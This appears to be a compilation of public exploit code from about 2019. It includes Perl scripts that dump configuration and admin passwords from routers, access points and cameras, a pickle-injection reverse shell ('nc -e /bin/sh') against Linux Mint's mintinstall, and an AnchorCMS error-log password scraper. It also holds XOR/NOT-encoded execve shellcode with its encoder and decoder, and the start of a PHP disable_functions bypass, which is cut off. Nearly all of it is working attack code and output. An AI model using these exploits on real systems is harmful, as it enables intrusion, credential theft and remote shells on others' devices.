#!/usr/bin/perl -w
#
#  Tellion TE01-005H HomeHub Router Remote Configuration Disclosure
#
#  Copyright 2019 (c) Todor Donev <todor.donev at gmail.com>
#
#
#  Disclaimer:
#  This or previous programs are for Educational purpose ONLY. Do not use it without permission. 
#  The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages 
#  caused by direct or indirect use of the  information or functionality provided by these programs. 
#  The author or any Internet provider  bears NO responsibility for content or misuse of these programs 
#  or any derivatives thereof. By using these programs you accept the fact  that any damage (dataloss, 
#  system crash, system compromise, etc.) caused by the use  of these programs are not Todor Donev's 
#  responsibility.
#   
#  Use them at your own risk!  
#  
#  (Dont do anything without permissions)
#
#  #  [ Tellion TE01-005H HomeHub Router Remote Configuration Disclosure
#  #  [ ================================================================
#  #  [ Exploit Author: Todor Donev 2019 <todor.donev@gmail.com>
#  #  [ Initializing the browser
#  #  [ >>  Referer => http://192.168.1.101:2040
#  #  [ >>  User-Agent => Mozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:1.7.5) Gecko/20050105 Epiphany/1.4.8
#  #  [ >>  Content-Type => application/x-www-form-urlencoded
#  #  [ <<  Connection => close
#  #  [ <<  Accept-Ranges => bytes
#  #  [ <<  Content-Length => 21410
#  #  [ <<  Content-Type => application/octet-stream
#  #  [ <<  Client-Date => Wed, 02 Oct 2019 06:24:48 GMT
#  #  [ <<  Client-Peer => 192.168.1.101:2040
#  #  [ <<  Client-Response-Num => 1
#  #  [ <<  Content-Disposition => attachment;filename="config.tgz"
#  #  [ <<  Content-Transfer-Encoding => binary
#  #  [ <<  Set-Cookie => QSESSIONID=86edd87d47e015af5c8f6a96028f0492; path=/
#  #  [
#  #  [ >> Configuration dump...
#  #  [
#  #  [ # To avoid automatic reconfiguration, wps_configured=1 is set; 
#  #  [ # however, WPS is allowed otherwise.
#  #  [ # Note wps_auth_type_flags=1 (open) and wps_encr_type_flags=1 (none)
#  #  [ ignore_file_errors=1
#  #  [ logger_syslog=-1
#  #  [ logger_syslog_level=2
#  #  [ logger_stdout=-1
#  #  [ logger_stdout_level=2
#  #  [ debug=0
#  #  [ dump_file=/tmp/hostapd.dump
#  #  [ ctrl_interface=/var/run/hostapd
#  #  [ ctrl_interface_group=0
#  #  [ ssid=SoIP
#  #  [ dtim_period=2
#  #  [ max_num_sta=255
#  #  [ macaddr_acl=0
#  #  [ auth_algs=1
#  #  [ ignore_broadcast_ssid=0
#  #  [ wme_enabled=0
#  #  [ ieee8021x=0
#  #  [ eapol_version=2
#  #  [ eapol_key_index_workaround=0
#  #  [ eap_server=1
#  #  [ eap_user_file=/etc/wpa2/hostapd.eap_user
#  #  [ wpa=0
#  #  [ 
#  #  [ ******
#  #  [ ******
# 
use strict;
use HTTP::Request;
use LWP::UserAgent;
use WWW::UserAgent::Random;
use Gzip::Faster;
my $host = shift || 'https://192.168.1.1'; # Full path url to the store
$host =~ s|/$||;
print  "\033[2J";    #clear the screen
print  "\033[0;0H"; #jump to 0,0
print STDERR "[ Tellion TE01-005H HomeHub Router Remote Configuration Disclosure\n";
print STDERR "[ ================================================================\n";
print STDERR "[ Exploit Author: Todor Donev 2019 <todor.donev\@gmail.com>\n";
print STDERR "[ e.g. perl $0 https://target:port/\n" and exit if ($host !~ m/^http/);
print STDERR "[ Initializing the browser\n";
my $user_agent = rand_ua("browsers");
my $browser  = LWP::UserAgent->new(protocols_allowed => ['http', 'https'],ssl_opts => { verify_hostname => 0 });
   $browser->timeout(30);
   $browser->agent($user_agent);
my $target = $host."\x2f\x63\x67\x69\x2d\x62\x69\x6e\x2f\x73\x79\x73\x74\x65\x6d\x5f\x63\x6f\x6e\x66\x69\x67\x5f\x66\x69\x6c\x65";
my $payload = "\x63\x6f\x6e\x66\x69\x67\x5f\x63\x6d\x64\x3d\x25\x43\x30\x25\x46\x41\x25\x43\x30\x25\x45\x35";
my $request = HTTP::Request->new (POST => $target,[Content_Type => "application/x-www-form-urlencoded",Referer => $host], $payload);                      
my $response = $browser->request($request) or die "[ Exploit Failed: $!";
print STDERR "[ >>  $_ => ", $request->header($_), "\n" for  $request->header_field_names;
print STDERR "[ <<  $_ => ", $response->header($_), "\n" for  $response->header_field_names;
my $gzip = $response->content();
print STDERR "[\n[ >> Configuration dump...\n[\n";
print  "[ ", $_, "\n" for split(/\n/,gunzip($gzip));

# Exploit Title: mintinstall (aka Software Manager) object injection
# Date: 10/02/2019
# Exploit Author: Andhrimnirr
# Vendor Homepage: https://www.linuxmint.com/
# Software Link: mintinstall (aka Software Manager)
# Version: 7.9.9
# Tested on: Linux Mint
# CVE : CVE-2019-17080


import os
import sys
def shellCode(payload):
    with open(f"{os.getenv('HOME')}/.cache/mintinstall/reviews.cache","w") as wb:
        wb.write(payload)
    print("[+] Start mintinstall")
if __name__=="__main__":
    shellCode(f"""cos\nsystem\n(S"nc -e /bin/sh {sys.argv[1]} {sys.argv[2]}"\ntR.""")
else:
    print("[!] exploit.py [IP] [PORT]")

# Exploit Title: Information disclosure (MySQL password) in error log
# Date: 2/10/2019
# Exploit Author: Tijme Gommers (https://twitter.com/finnwea/)
# Vendor Homepage: https://anchorcms.com/
# Software Link: https://github.com/anchorcms/anchor-cms/releases
# Version: 0.12.3a
# Tested on: Linux
# CVE : CVE-2018-7251

# By default, AnchorCMS will log errors to the "/anchor/errors.log" file in the webroot of the web application. This allows malicious users to access the error log and view potentally sensitive information. Sometimes the AnchorCMS error log contains ocurrences of the MySQL error "Can't connect to MySQL server on 'xxx.xxx.xxx.xxx' (111)". When this error occurs the variables of the MySQL connector class are serialized into a JSON object and logged to the error log.

import re
import sys
import importlib


def get_plain(url):
    try:
        plain_result = requests.get(url=url)
        return plain_result
    except:
        return None


def print_usage():
    print('Usage: {0} <url>'.format(__file__))


if __name__ == '__main__':

    # Ensure we have the URL
    if len(sys.argv) != 2:
        print_usage()
        sys.exit(1)

    print("* Using AnchorCMS website: " + sys.argv[1])

    print("* Trying to import 'requests' module")
    requests_loader = importlib.util.find_spec('requests')
    requests_module_found = requests_loader is not None

    if requests_module_found:
        import requests
    else:
        print("* 'requests' module not found, please install it using pip")
        print("* pip install requests")
        sys.exit(1)

    json_url = sys.argv[1].strip("/") + "/anchor/errors.log"
    print("* Trying to get errors.log file at: {}".format(json_url))
    plain_result = get_plain(json_url)

    if plain_result == None:
        print("* URL could not be requested, errors.log is probably not exposed")
        sys.exit(1)

    print("* Found data {}, trying to parse it now".format(plain_result))

    lines = re.findall(r'"line":\d', plain_result.text)

    print("* Found {} error entries".format(len(lines)))

    passwords = re.findall(r'\[([^\[\]]*)"password"([^\[\]]*)\]', plain_result.text)

    print("* Found {} passwords entries".format(len(passwords)))

    for password in passwords:
        print("+ {}".format(password))

#!/usr/bin/perl -w
#
#  Dongyoung Media DM-AP240T/W Wireless Access Point Remote Configuration Disclosure
#
#  Copyright 2019 (c) Todor Donev <todor.donev at gmail.com>
#
#
#  Disclaimer:
#  This or previous programs are for Educational purpose ONLY. Do not use it without permission. 
#  The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages 
#  caused by direct or indirect use of the  information or functionality provided by these programs. 
#  The author or any Internet provider  bears NO responsibility for content or misuse of these programs 
#  or any derivatives thereof. By using these programs you accept the fact  that any damage (dataloss, 
#  system crash, system compromise, etc.) caused by the use  of these programs are not Todor Donev's 
#  responsibility.
#   
#  Use them at your own risk!  
#  
#  (Dont do anything without permissions)
#
#
#   PASSWORD DISCLOSURE, TEST:
#
#  #  [test@localhost ~]$ perl dm-ap240t.pl http://192.168.1.102:8080
#  #  [ Dongyoung Media DM-AP240T/W Wireless Access Point Remote Configuration Disclosure
#  #  [ =================================================================================
#  #  [ Exploit Author: Todor Donev 2019 <todor.donev@gmail.com>
#  #  [ Initializing the browser
#  #  [ >>  Referer => http://192.168.1.102
#  #  [ >>  User-Agent => Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-gb) AppleWebKit/528.10+ (KHTML, like Gecko) Version/4.0dp1 Safari/526.11.2
#  #  [ >>  Content-Type => application/x-www-form-urlencoded
#  #  [ <<  Connection => close
#  #  [ <<  Accept-Ranges => bytes
#  #  [ <<  Content-Length => 33412
#  #  [ <<  Content-Type => application/octet-stream
#  #  [ <<  Client-Date => Thu, 03 Oct 2019 10:41:05 GMT
#  #  [ <<  Client-Peer => 192.168.1.102:8080
#  #  [ <<  Client-Response-Num => 1
#  #  [ <<  Content-Disposition => attachment;filename="config.tgz"
#  #  [ <<  Content-Transfer-Encoding => binary
#  #  [ <<  Set-Cookie => QSESSIONID=ea4bfb8c9455d441efefc531841d7459; path=/
#  #  [ 
#  #  [ Admin User : ktroot
#  #  [ Admin Pass : 1234567890
#  #  [test@localhost ~]$ 
#
#
#   CONFIGURATION DUMP, TEST:
#
#  #  [test@localhost ~]$ perl dm-ap240t.pl http://192.168.1.102:8080 show | head
#  #  [ Dongyoung Media DM-AP240T/W Wireless Access Point Remote Configuration Disclosure
#  #  [ =================================================================================
#  #  [ Exploit Author: Todor Donev 2019 <todor.donev@gmail.com>
#  #  [ Initializing the browser
#  #  [ >>  Referer => http://192.168.1.102
#  #  [ >>  User-Agent => Mozilla/5.0 (compatible; Konqueror/3.5; SunOS) KHTML/3.5.0 (like Gecko)
#  #  [ >>  Content-Type => application/x-www-form-urlencoded
#  #  [ <<  Connection => close
#  #  [ <<  Accept-Ranges => bytes
#  #  [ <<  Content-Length => 33415
#  #  [ <<  Content-Type => application/octet-stream
#  #  [ <<  Client-Date => Thu, 03 Oct 2019 10:15:16 GMT
#  #  [ <<  Client-Peer => 192.168.1.102:8080
#  #  [ <<  Client-Response-Num => 1
#  #  [ <<  Content-Disposition => attachment;filename="config.tgz"
#  #  [ <<  Content-Transfer-Encoding => binary
#  #  [ <<  Set-Cookie => QSESSIONID=34f95926faa74a38c4bf527c2545e816; path=/
#  #  [
#  #  [ >> Configuration dump...
#  #  [
#  #  [ ./config/0000755000000000000000000000000013545344507011170 5ustar  rootroot./config/hostapd_open_ath11.conf0000644000000000000000000000060400000000012015452 0ustar  rootrootignore_file_errors=1
#  #  [ logger_syslog=-1
#  #  [ logger_syslog_level=2
#  #  [ logger_stdout=-1
#  #  [ logger_stdout_level=2
#  #  [ debug=0
#  #  [ ctrl_interface=/var/run/hostapd
#  #  [ ctrl_interface_group=0
#  #  [ ssid=ATH11
#  #  [ ignore_broadcast_ssid=0
#  #  [test@localhost ~]$ 
#
# 
use strict;
use HTTP::Request;
use LWP::UserAgent;
use WWW::UserAgent::Random;
use Gzip::Faster;
my $host = shift || ''; # Full path url to the store
my $cmd = shift || ''; # show - Show configuration dump
$host =~ s/\/$//;
print  "\033[2J";    #clear the screen
print  "\033[0;0H"; #jump to 0,0
print STDERR "[ Dongyoung Media DM-AP240T/W Wireless Access Point Remote Configuration Disclosure\n";
print STDERR "[ =================================================================================\n";
print STDERR "[ Exploit Author: Todor Donev 2019 <todor.donev\@gmail.com>\n";
if ($host !~ m/^http/){ 
        print STDERR "[ Usage, Password Disclosure: perl $0 https://target:port/\n";
        print STDERR "[ Usage, Show Configuration : perl $0 https://target:port/ show\n";
        exit;
}
print STDERR "[ Initializing the browser\n";
my $user_agent = rand_ua("browsers");
my $browser  = LWP::UserAgent->new(protocols_allowed => ['http', 'https'],ssl_opts => { verify_hostname => 0 });
   $browser->timeout(30);
   $browser->agent($user_agent);
my $target = $host."\x2f\x63\x67\x69\x2d\x62\x69\x6e\x2f\x73\x79\x73\x5f\x73\x79\x73\x74\x65\x6d\x5f\x63\x6f\x6e\x66\x69\x67";
my $payload = "\x63\x6f\x6e\x66\x69\x67\x5f\x63\x6d\x64\x3d\x25\x43\x30\x25\x46\x41\x25\x43\x30\x25\x45\x35";
my $request = HTTP::Request->new (POST => $target,[Content_Type => "application/x-www-form-urlencoded",Referer => $host], $payload);                      
my $response = $browser->request($request) or die "[ Exploit Failed: $!";
print STDERR "[ >>  $_ => ", $request->header($_), "\n" for  $request->header_field_names;
print STDERR "[ <<  $_ => ", $response->header($_), "\n" for  $response->header_field_names;
my $gzipped = $response->content();
my $config = gunzip($gzipped);
print STDERR "[ \n";
if ($cmd =~ /show/) {
        print STDERR "[ >> Configuration dump...\n[\n";
        print  "[ ", $_, "\n" for split(/\n/,$config);
        exit;
} else {
        print  "[ Admin User : ", $1, "\n" if($config =~ /ROOT_ID=(.*)/);
        print  "[ Admin Pass : ", $1, "\n" if($config =~ /ROOT_PW=(.*)/);
        exit;
}

#!/usr/bin/perl -w
#
#  Hisilicon Hi3518 HD Camera Remote Configuration Disclosure
#
#  Copyright 2019 (c) Todor Donev <todor.donev at gmail.com>
#
#
#  Disclaimer:
#  This or previous programs are for Educational purpose ONLY. Do not use it without permission. 
#  The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages 
#  caused by direct or indirect use of the  information or functionality provided by these programs. 
#  The author or any Internet provider  bears NO responsibility for content or misuse of these programs 
#  or any derivatives thereof. By using these programs you accept the fact  that any damage (dataloss, 
#  system crash, system compromise, etc.) caused by the use  of these programs are not Todor Donev's 
#  responsibility.
#   
#  Use them at your own risk!  
#  
#  (Dont do anything without permissions)
#
#
#  #  [ Hisilicon Hi3518 HD Camera Remote Configuration Disclosure
#  #  [ ==========================================================
#  #  [ Exploit Author: Todor Donev 2019 <todor.donev@gmail.com>
#  #  [ Initializing the browser
#  #  [ >>  User-Agent => Mozilla/5.0 (compatible; Konqueror/3.5; OpenBSD) KHTML/3.5.9 (like Gecko)
#  #  [ >>  Content-Type => application/x-www-form-urlencoded
#  #  [ <<  Connection => close
#  #  [ <<  Date => Thu, 03 Oct 2019 13:11:15 GMT
#  #  [ <<  Accept-Ranges => bytes
#  #  [ <<  Server => thttpd/2.25b 29dec2003
#  #  [ <<  Content-Length => 23878
#  #  [ <<  Content-Type => application/octet-stream
#  #  [ <<  Last-Modified => Thu, 03 Oct 2019 13:11:14 GMT
#  #  [ <<  Client-Date => Thu, 03 Oct 2019 13:11:23 GMT
#  #  [ <<  Client-Peer => 192.168.1.1:80
#  #  [ <<  Client-Response-Num => 1
#  #  [ 
#  #  [ Username : admin
#  #  [ Password : admin
#
#
#   CONFIGURATION DUMP, TEST:
#
#  #  [ Hisilicon Hi3518 HD Camera Remote Configuration Disclosure
#  #  [ ==========================================================
#  #  [ Exploit Author: Todor Donev 2019 <todor.donev@gmail.com>
#  #  [ Initializing the browser
#  #  [ >>  User-Agent => Mozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.8.1.14) Gecko/20080821 Firefox/2.0.0.14
#  #  [ >>  Content-Type => application/x-www-form-urlencoded
#  #  [ <<  Connection => close
#  #  [ <<  Date => Thu, 03 Oct 2019 13:13:05 GMT
#  #  [ <<  Accept-Ranges => bytes
#  #  [ <<  Server => thttpd/2.25b 29dec2003
#  #  [ <<  Content-Length => 23878
#  #  [ <<  Content-Type => application/octet-stream
#  #  [ <<  Last-Modified => Thu, 03 Oct 2019 13:13:04 GMT
#  #  [ <<  Client-Date => Thu, 03 Oct 2019 13:13:13 GMT
#  #  [ <<  Client-Peer => 192.168.1.1:80
#  #  [ <<  Client-Response-Num => 1
#  #  [ 
#  #  [ >> Configuration dump...
#  #  [
#  #  [ #  #  [debuglog]                                            
#  #  [ minlevel                       = "7             ";ȡֵ��Χ:
#  #  [                                                 ;   0,""
#  #  [                                                 ;   1,"#  #  [fatal   ]"
#  #  [                                                 ;   2,"#  #  [error   ]"
#  #  [                                                 ;   3,"#  #  [warn    ]"
#  #  [                                                 ;   4,"#  #  [info    ]"
#  #  [                                                 ;   5,"#  #  [debug   ]"
#  #  [                                                 ;   6,"#  #  [debug1  ]"
#  #  [                                                 ;   7,"#  #  [debug2  ]"
#  #  [ lenmsg                         = "512          ";Ӧ����������ij��
#  #  [ syslog                         = "n             " ;�C·ï¿½ï¿½ï¿½ï¿½ï¿½ÏµÍ³ï¿½ï¿½Ö¾
#  #  [ savefile                       = "y             " ;�C·ï¿½ï¿½ï¿½ï¿½Ä¼ï¿½;
#  #  [ filename                       = "/bin/vs/log/debuglog.txt  ";
#  #  [ filemaxsize                    = "500            ";�����ļ�����������,��KBΪ��λ
#  #  [ 
#  #  [ #  #  [syslog]                                            
#  #  [ minlevel                       = "7             ";ȡֵ��Χ:
#  #  [                                                 ;   0,""
#  #  [                                                 ;   1,"#  #  [fatal   ]"
#  #  [                                                 ;   2,"#  #  [error   ]"
#  #  [                                                 ;   3,"#  #  [warn    ]"
#  #  [                                                 ;   4,"#  #  [info    ]"
#  #  [                                                 ;   5,"#  #  [debug   ]"
#  #  [                                                 ;   6,"#  #  [debug1  ]"
#  #  [                                                 ;   7,"#  #  [debug2  ]"
#  #  [ lenmsg                         = "512            ";Ӧ����������ij��
#  #  [ syslog                         = "y              ";�C·ï¿½ï¿½ï¿½ï¿½ï¿½ÏµÍ³ï¿½ï¿½Ö¾
#  #  [ savefile                       = "n              ";�C·ï¿½ï¿½ï¿½ï¿½Ä¼ï¿½;
#  #  [ filename                       = "";
#  #  [ filemaxsize                    = "";�����ļ�����������,��KBΪ��λ
#  #  [ 
#  #  [ #  #  [accesslog]                                            
#  #  [ minlevel                       = "5             ";ȡֵ��Χ:
#  #  [                                                 ;   0,""
#  #  [                                                 ;   1,"#  #  [fatal   ]"
#  #  [                                                 ;   2,"#  #  [error   ]"
#  #  [                                                 ;   3,"#  #  [warn    ]"
#  #  [                                                 ;   4,"#  #  [info    ]"
#  #  [                                                 ;   5,"#  #  [debug   ]"
#  #  [                                                 ;   6,"#  #  [debug1  ]"
#  #  [                                                 ;   7,"#  #  [debug2  ]"
#  #  [ lenmsg                         = "512            ";Ӧ����������ij��
#  #  [ syslog                         = "n              ";�C·ï¿½ï¿½ï¿½ï¿½ï¿½ÏµÍ³ï¿½ï¿½Ö¾
#  #  [ savefile                       = "y              ";�C·ï¿½ï¿½ï¿½ï¿½Ä¼ï¿½;
#  #  [ filename                       = "/bin/vs/log/accesslog.txt ";
#
# 
use strict;
use HTTP::Request;
use LWP::UserAgent;
use WWW::UserAgent::Random;
use Gzip::Faster 'gunzip';

my $host = shift || ''; # Full path url to the store
my $cmd = shift || ''; # show - Show configuration dump
$host =~ s/\/$//;
print  "\033[2J";    #clear the screen
print  "\033[0;0H"; #jump to 0,0
print STDERR "[ Hisilicon Hi3518 HD Camera Remote Configuration Disclosure\n";
print STDERR "[ ==========================================================\n";
print STDERR "[ Exploit Author: Todor Donev 2019 <todor.donev\@gmail.com>\n";
if ($host !~ m/^http/){ 
        print STDERR "[ Usage, Password Disclosure: perl $0 https://target:port/\n";
        print STDERR "[ Usage, Show Configuration : perl $0 https://target:port/ show\n";
        exit;
}
print STDERR "[ Initializing the browser\n";
my $user_agent = rand_ua("browsers");
my $browser  = LWP::UserAgent->new(protocols_allowed => ['http', 'https'],ssl_opts => { verify_hostname => 0 });
   $browser->timeout(30);
   $browser->agent($user_agent);
my $target = $host."\x2f\x77\x65\x62\x2f\x63\x67\x69\x2d\x62\x69\x6e\x2f\x68\x69\x33\x35\x31\x30\x2f\x62\x61\x63\x6b\x75\x70\x2e\x63\x67\x69";
my $request = HTTP::Request->new (GET => $target,[Content_Type => "application/x-www-form-urlencoded"]);                      
my $response = $browser->request($request) or die "[ Exploit Failed: $!";
print STDERR "[ >>  $_ => ", $request->header($_), "\n" for  $request->header_field_names;
print STDERR "[ <<  $_ => ", $response->header($_), "\n" for  $response->header_field_names;
my $gzipped = $response->content();
my $config = gunzip($gzipped);
print STDERR "[ \n";
if ($cmd =~ /show/) {
        print STDERR "[ >> Configuration dump...\n[\n";
        print  "[ ", $_, "\n" for split(/\n/,$config);
        exit;
} else {
        print  "[ Username : ", $1, "\n" if ($config =~ /username=(.*)/);
        print  "[ Password : ", $1, "\n" if ($config =~ /password=(.*)/);
        exit;
}

# Date: 4th October 2019
# Shellcode Author: @bolonobolo - https://bolonobolo.github.io
# Tested on: Linux x86

######################## execve.asm ###############################

global _start

section .text
_start:


; put NULL bytes in the stack
xor eax, eax
push eax

//bin/sh
push 0x68732f6e
push 0x69622f2f
mov ebx, esp

; push NULL in the EDX position
push eax
mov edx, esp

; push in the stack and then move it in ECX
push ebx
mov ecx, esp

; call the execve syscall
mov al, 11
int 0x80
###############################################################

compile the execve-stack
$ nasm -f elf32 execve.asm
$ ld -N -o sh execve.o
$ echo;objdump -d ./execve|grep '[0-9a-f]:'|grep -v 'file'|cut -f2
-d:|cut -f1-6 -d''|tr -s ''|tr '\t'''|sed 's/ $//g'|sed 's/
/\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g';echo

"\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"

########################## encoder_mixer.py ####################

#!/usr/bin/python

# Python Encoder (XOR + NOT + Random)
import random
green = lambda text: '\033[0;32m' + text + '\033[0m'

shellcode =
("\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80")
encoded = ""

# The end char is 0xaa
end = "\\xaa"

print 'Encoded shellcode ...'

for x in bytearray(shellcode) :

        if x < 128:
                # XOR Encoding with 0xDD
                x = x^0xDD
                # placeholder for XOR is 0xbb
                encoded += '\\xbb'
                encoded += '\\x'
                encoded += '%02x' % x
        else:
# NOT encoding
                x = ~x
# placeholder for NOT is 0xcc
                encoded += '\\xcc'
                encoded += '\\x'
                encoded += '%02x' % (x & 0xff)

 # 0xaa is 170 in dec and the others placeholders are > of 170
        encoded += '\\x%02x' % random.randint(1,169)

print green("Shellcode Len: %d" % len(bytearray(shellcode)))
print green("Encoded Shellcode Len: %d" % len(bytearray(encoded)))
encoded = encoded + end
print encoded
nasm = str(encoded).replace("\\x", ",0x")
nasm = nasm[1:]
# end string char is 0xaa
print green("NASM version:")
# end = end.replace("\\x", ",0x")
print nasm

###################################################################

root@root:$ ./encoder_mixer.py
Encoded shellcode ...
Shellcode Len: 25
Encoded Shellcode Len: 300
\xbb\xec\x26\xcc\x3f\x4a\xbb\x8d\x3d\xbb\xb5\x44\xbb\xb3\x5b\xbb\xf2\x65\xbb\xae\x09\xbb\xb5\x2a\xbb\xb5\x2b\xbb\xf2\x1a\xbb\xf2\x4d\xbb\xbf\x9a\xbb\xb4\x61\xcc\x76\x56\xcc\x1c\x59\xbb\x8d\x56\xcc\x76\x6c\xcc\x1d\x94\xbb\x8e\x02\xcc\x76\xa5\xcc\x1e\x6d\xcc\x4f\xa3\xbb\xd6\x22\xcc\x32\x18\xcc\x7f\x7b\xaa
NASM version:
0xbb,0xec,0x26,0xcc,0x3f,0x4a,0xbb,0x8d,0x3d,0xbb,0xb5,0x44,0xbb,0xb3,0x5b,0xbb,0xf2,0x65,0xbb,0xae,0x09,0xbb,0xb5,0x2a,0xbb,0xb5,0x2b,0xbb,0xf2,0x1a,0xbb,0xf2,0x4d,0xbb,0xbf,0x9a,0xbb,0xb4,0x61,0xcc,0x76,0x56,0xcc,0x1c,0x59,0xbb,0x8d,0x56,0xcc,0x76,0x6c,0xcc,0x1d,0x94,0xbb,0x8e,0x02,0xcc,0x76,0xa5,0xcc,0x1e,0x6d,0xcc,0x4f,0xa3,0xbb,0xd6,0x22,0xcc,0x32,0x18,0xcc,0x7f,0x7b,0xaa

#################### decoder_mixer.asm ############################

global _start

section .text
_start:


jmp short call_decoder


decoder:
        ; the sequence of the chars in shellcode is:
; placehlder,obfuscated shellcode char,random char
pop esi
        lea edi, [esi]
        xor eax, eax
        xor ebx, ebx

switch:

        mov bl, byte [esi + eax]
        cmp bl, 0xaa
        jz shellcode
        cmp bl, 0xbb
        jz xordecode
        jmp notdecode

xordecode:

        mov bl, byte [esi + eax + 1]
        mov byte [edi], bl
        xor byte [edi], 0xDD
        inc edi
        add al, 3
        jmp short switch

notdecode:

        mov bl, byte [esi + eax + 1]
        mov byte [edi], bl
        not byte [edi]
        inc edi
        add al, 3
        jmp short switch

call_decoder:

call decoder
shellcode: db
0xbb,0xec,0x73,0xcc,0x3f,0x9d,0xbb,0x8d,0x51,0xbb,0xb5,0x1b,0xbb,0xb3,0x22,0xbb,0xf2,0x79,0xbb,0xae,0x8e,0xbb,0xb5,0x61,0xbb,0xb5,0x3d,0xbb,0xf2,0x6e,0xbb,0xf2,0x9f,0xbb,0xbf,0x10,0xbb,0xb4,0x89,0xcc,0x76,0x2d,0xcc,0x1c,0x2f,0xbb,0x8d,0x91,0xcc,0x76,0x7e,0xcc,0x1d,0x92,0xbb,0x8e,0x80,0xcc,0x76,0x7b,0xcc,0x1e,0xa7,0xcc,0x4f,0x7f,0xbb,0xd6,0x2b,0xcc,0x32,0x24,0xcc,0x7f,0x37,0xaa

############################### shellcode ############################

$ nasm -f elf32 decoder_mixer.asm
$ ld -o decoder decoder_mixer.o
$ objdump -d ./decoder_mixer|grep '[0-9a-f]:'|grep -v 'file'|cut -f2
-d:|cut -f1-6 -d''|tr -s ''|tr '\t'''|sed 's/ $//g'|sed 's/
/\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'

"\xeb\x31\x5e\x8d\x3e\x31\xc0\x31\xdb\x8a\x1c\x06\x80\xfb\xaa\x74\x27\x80\xfb\xbb\x74\x02\xeb\x0e\x8a\x5c\x06\x01\x88\x1f\x80\x37\xdd\x47\x04\x03\xeb\xe3\x8a\x5c\x06\x01\x88\x1f\xf6\x17\x47\x04\x03\xeb\xd6\xe8\xca\xff\xff\xff\xbb\xec\x73\xcc\x3f\x9d\xbb\x8d\x51\xbb\xb5\x1b\xbb\xb3\x22\xbb\xf2\x79\xbb\xae\x8e\xbb\xb5\x61\xbb\xb5\x3d\xbb\xf2\x6e\xbb\xf2\x9f\xbb\xbf\x10\xbb\xb4\x89\xcc\x76\x2d\xcc\x1c\x2f\xbb\x8d\x91\xcc\x76\x7e\xcc\x1d\x92\xbb\x8e\x80\xcc\x76\x7b\xcc\x1e\xa7\xcc\x4f\x7f\xbb\xd6\x2b\xcc\x32\x24\xcc\x7f\x37\xaa"

## Put the hex code in a C script

root@root:# cat shellcode.c
#include<stdio.h>
#include<string.h>

unsigned char code[] = \
"\xeb\x31\x5e\x8d\x3e\x31\xc0\x31\xdb\x8a\x1c\x06\x80\xfb\xaa\x74\x27\x80\xfb\xbb\x74\x02\xeb\x0e\x8a\x5c\x06\x01\x88\x1f\x80\x37\xdd\x47\x04\x03\xeb\xe3\x8a\x5c\x06\x01\x88\x1f\xf6\x17\x47\x04\x03\xeb\xd6\xe8\xca\xff\xff\xff\xbb\xec\x73\xcc\x3f\x9d\xbb\x8d\x51\xbb\xb5\x1b\xbb\xb3\x22\xbb\xf2\x79\xbb\xae\x8e\xbb\xb5\x61\xbb\xb5\x3d\xbb\xf2\x6e\xbb\xf2\x9f\xbb\xbf\x10\xbb\xb4\x89\xcc\x76\x2d\xcc\x1c\x2f\xbb\x8d\x91\xcc\x76\x7e\xcc\x1d\x92\xbb\x8e\x80\xcc\x76\x7b\xcc\x1e\xa7\xcc\x4f\x7f\xbb\xd6\x2b\xcc\x32\x24\xcc\x7f\x37\xaa";

void main()
{

printf("Shellcode Length:  %d\n", strlen(code));

int (*ret)() = (int(*)())code;

ret();

}



root@root# gcc -fno-stack-protector -z execstack shellcode.c -o shellcode
root@root# ./shellcode
Shellcode Length:  132
# whoami
root
# exit

<?php

# PHP 7.0-7.3 disable_functions bypass PoC (*nix only)
#
# Bug: https://bugs.php.net/bug.php?id=72530
#
# This exploit should work on all PHP 7.0-7.3 versions
# released as of 04/10/2019, specifically:
# 
# PHP 7.0 - 7.0.33
# PHP 7.1 - 7.1.31
# PHP 7.2 - 7.2.23
# PHP 7.3 - 7.3.10
#
# Author: https://github.com/mm0r1

pwn("uname -a");

function pwn($cmd) {
    global $abc, $helper;

    function str2ptr(&$str, $p = 0, $s = 8) {
        $address = 0;
        for($j = $s-1; $j >= 0; $j--) {
            $address <<= 8;
            $address |= ord($str[$p+$j]);
        }
        return $address;
    }

    function ptr2str($ptr, $m = 8) {
        $out = "";
        for ($i=0; $i < $m; $i++) {
            $out .= chr($ptr & 0xff);
            $ptr >>= 8;
        }
        return $out;
    }

    function write(&$str, $p, $v, $n = 8) {
        $i = 0;
        for($i = 0; $i < $n; $i++) {
            $str[$p + $i] = chr($v & 0xff);
            $v >>= 8;
        }
    }

    function leak($addr, $p = 0, $s = 8) {
        global $abc, $helper;
        write($abc, 0x68, $addr + $p - 0x10);
        $leak = strlen($helper->a);
        if($s != 8) { $leak %= 2 << ($s * 8) - 1; }
        return $leak;
    }

    function parse_elf($base) {
        $e_type = leak($base, 0x10, 2);

        $e_phoff = leak($base, 0x20);
        $e_phentsize = leak($base, 0x36, 2);
        $e_phnum = leak($base, 0x38, 2);

        for($i = 0; $i < $e_phnum; $i++) {
            $header = $base + $e_phoff + $i * $e_phentsize;
            $p_type  = leak($header, 0, 4);
            $p_flags = leak($header, 4, 4);
            $p_vaddr = leak($header, 0x10);
            $p_memsz = leak($header, 0x28);

            if($p_type == 1 && $p_flags == 6) { # PT_LOAD, PF_Read_Write
                # handle pie
                $data_addr = $e_type == 2 ? $p_vaddr : $base + $p_vaddr;
                $data_size = $p_memsz;
            } else if($p_type == 1 && $p_flags == 5) { # PT_LOAD, PF_Read_exec
                $text_size = $p_memsz;
            }
        }

        if(!$data_addr || !$text_size || !$data_size)
            return false;

        return [$data_addr, $text_size, $data_size];
    }

    function get_basic_funcs($base, $elf) {
        list($data_addr, $text_size, $data_size) = $elf;
        for($i = 0; $i < $data_size / 8; $i++) {
            $leak = leak($data_addr, $i * 8);
            if($leak - $base > 0 && $leak - $base < $text_size) {
                $deref = leak($leak);
                # 'constant' constant check
